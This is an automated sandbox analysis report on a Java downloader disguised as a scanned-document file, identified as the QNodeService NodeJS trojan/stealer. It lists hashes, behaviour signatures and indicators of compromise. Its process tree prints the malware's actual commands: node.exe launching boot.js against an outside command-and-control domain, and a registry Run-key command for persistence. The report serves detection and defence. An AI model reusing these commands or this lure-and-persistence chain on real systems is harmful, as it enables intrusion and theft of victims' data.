Analysis
-
max time kernel
119s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 12:52
Static task
static1
Behavioral task
behavioral1
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win7
Behavioral task
behavioral2
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win10
General
-
Target
Scanned from a Xerox Multifunction Printer.jar
-
Size
71KB
-
MD5
ef50330c3ba37193196fb2678b81c358
-
SHA1
fedda1f30f37cfbcd7a30fadfb32da968923bc55
-
SHA256
51a266885dd543b93c91be648fd52e64fae3a3af8a17616e86357facb982622f
-
SHA512
ea5a1a3b90f3663dea5408d49b6e453872fd6446d688ac409d9c750478c17b1b8ab2e47ea95e2f1860f9af4cf5b83fbbf806671781c09d6b2e08ef880f23b024
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1788 node.exe 1360 node.exe 1236 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\6d525496-aed7-45ef-84d3-bc52e5b4f80b = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab5f-174.dat js behavioral2/files/0x000100000001ab5f-177.dat js behavioral2/files/0x000100000001ab5f-181.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 wtfismyip.com 28 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1788 node.exe 1788 node.exe 1788 node.exe 1788 node.exe 1360 node.exe 1360 node.exe 1360 node.exe 1360 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4032 wrote to memory of 3672 4032 java.exe 75 PID 4032 wrote to memory of 3672 4032 java.exe 75 PID 3672 wrote to memory of 1788 3672 javaw.exe 79 PID 3672 wrote to memory of 1788 3672 javaw.exe 79 PID 1788 wrote to memory of 1360 1788 node.exe 81 PID 1788 wrote to memory of 1360 1788 node.exe 81 PID 1360 wrote to memory of 1236 1360 node.exe 82 PID 1360 wrote to memory of 1236 1360 node.exe 82 PID 1236 wrote to memory of 3580 1236 node.exe 84 PID 1236 wrote to memory of 3580 1236 node.exe 84 PID 3580 wrote to memory of 3936 3580 cmd.exe 85 PID 3580 wrote to memory of 3936 3580 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Scanned from a Xerox Multifunction Printer.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\1c07e8ca.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain karimrnosa2.home-webserver.de3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3936
-
-
-
-
-
-